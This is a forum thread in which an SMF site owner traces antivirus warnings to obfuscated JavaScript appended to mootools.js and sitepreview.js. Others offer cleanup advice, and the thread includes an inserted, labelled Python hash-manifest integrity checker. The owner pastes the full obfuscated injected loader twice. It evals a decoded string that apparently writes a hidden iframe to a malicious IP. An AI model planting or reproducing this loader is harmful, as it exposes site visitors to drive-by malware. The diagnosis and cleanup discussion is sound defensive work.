A couple of days ago users of our site began to get warnings from virus software. Our site is now being reported as a risk.
I have gone through much of the site, including the database and can find nothing changed.
When checking the site through a console web program, I can find this code being run:
<iframe width="1" height="1" src="http://178.208.xx.xxx/go.php?sid=1" frameBorder="0">
I believe this is the link causing data to be pulled from a malicious site.
However, I cannot find that bit of code in any file or anywhere on the site.
Any ideas on how I can track down what is executing this?
Currently running 1.1.14
Site is here: http://ksguild.org/index.php
The code itself is probably encoded (encrypted). Look for the string "decode" (as in, base64_decode) or for random-looking data in a function. Especially look at the beginning and end of files -- usually stuff like this gets tacked on there, rather than being inserted in the middle of a file (risking breaking it).
Thanks for the response.
I have checked all files on the site, that code is not present.
I have also done as you suggested and looked for decode statements... There were several, but all were legitimate so far as I can tell.
Previously I checked modified dates, and no files have been modified recently.
Any other suggestions?
In the 5 years or so we have used smf, this is the first time we have had any kind of issue with security. Beating my head against the wall trying to figure out where these extra calls are coming from.
The sites it calls change frequently, but the above IP is always called.
I added an .htaccess to block that ip, but I would like to find how/where this code is getting executed.
If I were you, I would take a full backup of the database, then delete all files in your SMF directory and re-upload the SMF files. You will have to redo any customisations, but it's a sure-fire way to make sure no SMF files are infected with malicious code.
If you checked all smf files especially those ending with index.php, check your block codes on your tp98.
The easiest way to find that code would be to use a text editor that's capable of searching entire directories (Notepad++, etc. - neither text editor that's included with Windows has this option).
Alternately, if you have shell access, login to the shell and run this command, replacing "/path/to/your/forum" with the actual path to your SMF directory:
grep -r "iframe" /path/to/your/forum
I don't think that should return any false positives, as SMF shouldn't have anything with "iframe" in it by default.
Thanks for the help all, finally tracked it down.
First thing I tried Oldiesmann. :) Love notepad++
Unfortunately, since it was a bit of js, it didn't actually have iframe or any of the other elements I saw executing.
It was quite elusive...
I found an extra bit of code tacked onto a js file used by TP. (mootools.js)
Removed the code and everything is fine now.
Now I just need to figure out how they did it, so I can prevent it from happening again.
Any ideas on how they may have accomplished this (or how to prevent it)? I checked through both the forum log and servers logs, didn't find anything.
Maybe it is a line that comes in that file when you installed it? Have you checked that first?
When I found that bit of code, I checked it against a backup I had of the file in question, the backup did not have that code. So somehow it was added to the file.
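An added example, not code from the thread or from SMF, of why comparing against a known-good backup worked where modification dates did not: a manifest of SHA-256 hashes taken from a clean copy is compared against the live tree on every run, so an appended line is reported even when the file's mtime has been reset. The sample files, the appended line, and the directory layout are all constructed here for the demonstration.

```python
"""Hash-manifest integrity check (added example, not from the thread).

Whoever writes to a file can also set its modification time back to what it
was, so "no files modified recently" proves nothing.  A content hash taken
from a known-good copy cannot be fooled that way.
"""
import hashlib
import os
import tempfile
from pathlib import Path


def build_manifest(root):
    """Map each file under root (relative POSIX path) to its SHA-256 hex digest."""
    root = Path(root)
    manifest = {}
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        manifest[path.relative_to(root).as_posix()] = hashlib.sha256(path.read_bytes()).hexdigest()
    return manifest


def compare(baseline, current):
    """Report files that appeared, vanished, or whose content hash changed."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "changed": sorted(p for p in baseline.keys() & current.keys() if baseline[p] != current[p]),
    }


def demo():
    """Constructed scenario: baseline a small tree, append to one JS file while
    preserving its mtime, then show the hash diff still catches it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "js").mkdir()
        (root / "js" / "mootools.js").write_text("var MooTools={version:'1.2.4'};\n")
        (root / "js" / "sha1.js").write_text("function sha1(s){/* ... */}\n")
        (root / "index.php").write_text("<?php echo 'ok';\n")
        baseline = build_manifest(root)

        target = root / "js" / "mootools.js"
        before = target.stat()
        with target.open("a") as fh:
            fh.write("/* constructed stand-in for an appended injected line */\n")
        # Put the timestamps back exactly as they were (nanosecond precision).
        os.utime(target, ns=(before.st_atime_ns, before.st_mtime_ns))
        mtime_changed = target.stat().st_mtime_ns != before.st_mtime_ns

        report = compare(baseline, build_manifest(root))
    return report, mtime_changed


if __name__ == "__main__":
    report, mtime_changed = demo()
    print("mtime changed:", mtime_changed)   # False: the date check would miss it
    print("hash diff:", report)              # the appended file is listed under "changed"
```

In practice the baseline manifest is written once from a clean install (or the backup) and stored off the web server, then re-checked from a scheduled job; any entry under "changed" or "added" is a file to inspect before anything else.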
Have you asked your host about it? Maybe there is an issue with the server.
I have not checked with our hosting service.... but prolly not a bad idea to do so. :)
It could be code you're using to display the Iowa news. I'm guessing it uses .js
Rss?
Quote from: bluedevil - September 07, 2011, 01:17:01 PM
It could be code you're using to display the Iowa news. I'm guessing it uses .js
Rss?
Wrong site, this is the ksguild site. The Iowa site is more an old experiment that I don't really use much.... been meaning to update it to 2.0, just haven't got around to it.
It must have happened because of an FTP login from a virus-infected computer. I myself had an issue just like that. I was at my friend's house and his PC was infected with viruses; I logged into the FTP of one of my sites and just 10 seconds later my site's PHP files got infected with some code...
So BE careful about FTP logins.
Who is your host?
Dreamhost.
Have been using them for 5 yrs and have never had much of an issue.
Have you checked your sha1.js file?
I have checked all files and the database, only file affected was one I listed. I do have that file (sha1.js), but it is fine.
My only thought now is perhaps a mod or something I haven't updated has a vulnerability. I will be updating everything as I have time over the next few days. For instance, I am using an older version of tp (tiny portal), it was a tp file affected.
Since I removed that code added to that file, I have had no other issues. Still don't know exactly how the file was modified.
Strange.
What I find interesting is that it is identical code (as far as I can tell) added to the js file as in the other thread.
String.prototype.test="harC";for(i in $='')if(i=='test')m=$[i];var ss="";try{eval('asdas')}catch(q){s=String["fr"+"omC"+m+"od"+'e'];}d=new Date();d2=new Date(d.valueOf()-2);Object.prototype.asd="e";try{for(i in{})if(~i.indexOf('sd'))throw 1;}catch(q){n=-1*(d-d2);}
n=[98-n,109-n,97-n,115-n,107-n,99-n,108-n,114-n,44-n,117-n,112-n,103-n,114-n,99-n,38-n,32-n,58-n,103-n,100-n,112-n,95-n,107-n,99-n,30-n,113-n,112-n,97-n,59-n,37-n,102-n,114-n,114-n,110-n,56-n,45-n,45-n,47-n,53-n,54-n,44-n,48-n,46-n,54-n,44-n,54-n,48-n,44-n,47-n,47-n,49-n,45-n,101-n,109-n,44-n,110-n,102-n,110-n,61-n,113-n,103-n,98-n,59-n,47-n,37-n,30-n,117-n,103-n,98-n,114-n,102-n,59-n,37-n,47-n,37-n,30-n,102-n,99-n,103-n,101-n,102-n,114-n,59-n,37-n,47-n,37-n,30-n,100-n,112-n,95-n,107-n,99-n,96-n,109-n,112-n,98-n,99-n,112-n,59-n,37-n,46-n,37-n,60-n,58-n,45-n,103-n,100-n,112-n,95-n,107-n,99-n,60-n,32-n,39-n,57-n];for(i=0;i<n.length;i++)ss+=s(eval("n"+"["+"i"+"]"));eval(ss);
Found a file on another of my sites (it's on a separate server from my other site) which had the same code injected. File was sitepreview.js.
String.prototype.test="harC";for(i in $='')if(i=='test')m=$[i];var ss="";try{eval('asdas')}catch(q){s=String["fr"+"omC"+m+"od"+'e'];}d=new Date();d2=new Date(d.valueOf()-2);Object.prototype.asd="e";try{for(i in{})if(~i.indexOf('sd'))throw 1;}catch(q){n=-1*(d-d2);}
n=[98-n,109-n,97-n,115-n,107-n,99-n,108-n,114-n,44-n,117-n,112-n,103-n,114-n,99-n,38-n,32-n,58-n,103-n,100-n,112-n,95-n,107-n,99-n,30-n,113-n,112-n,97-n,59-n,37-n,102-n,114-n,114-n,110-n,56-n,45-n,45-n,47-n,53-n,54-n,44-n,48-n,46-n,54-n,44-n,54-n,48-n,44-n,47-n,47-n,49-n,45-n,101-n,109-n,44-n,110-n,102-n,110-n,61-n,113-n,103-n,98-n,59-n,47-n,37-n,30-n,117-n,103-n,98-n,114-n,102-n,59-n,37-n,47-n,37-n,30-n,102-n,99-n,103-n,101-n,102-n,114-n,59-n,37-n,47-n,37-n,30-n,100-n,112-n,95-n,107-n,99-n,96-n,109-n,112-n,98-n,99-n,112-n,59-n,37-n,46-n,37-n,60-n,58-n,45-n,103-n,100-n,112-n,95-n,107-n,99-n,60-n,32-n,39-n,57-n];for(i=0;i<n.length;i++)ss+=s(eval("n"+"["+"i"+"]"));eval(ss);
This site also has a different log in and so on... so I know it wasn't through ftp.
What mods do you have installed on both sites? Do you know what mod/theme installed that file?
It was a site preview mod (for links).
ksguild is heavily modded. Plus I have several of my own custom edits. This other site really has nothing in common except it uses smf (an outdated version).
The site is quite outdated.... don't really use it.
I am currently deleting the whole site and doing a fresh upload of 2.0.
How did that work out?
Currently have 2 sites updated to 2.0, looking good. :)
Both are in my sig.
Glad you were able to get rid of the bad file.